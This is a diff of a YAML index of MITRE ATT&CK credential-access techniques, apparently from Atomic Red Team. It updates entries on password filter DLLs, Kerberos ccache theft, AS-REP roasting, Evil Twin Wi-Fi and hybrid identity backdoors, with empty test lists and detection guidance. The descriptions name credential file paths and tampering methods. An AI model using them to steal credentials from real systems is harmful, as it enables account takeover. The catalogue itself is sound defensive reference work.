         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44417,38 +45062,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -44472,76 +45092,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -44576,6 +45249,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44583,32 +45263,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -44644,7 +45360,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -44669,13 +45385,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -44684,14 +45393,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -44713,23 +45414,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -44780,12 +45472,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -44797,6 +45488,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -44811,18 +45503,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -44845,37 +45537,115 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1552
+    atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      identifier: T1552
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -44883,9 +45653,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -44894,21 +45664,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
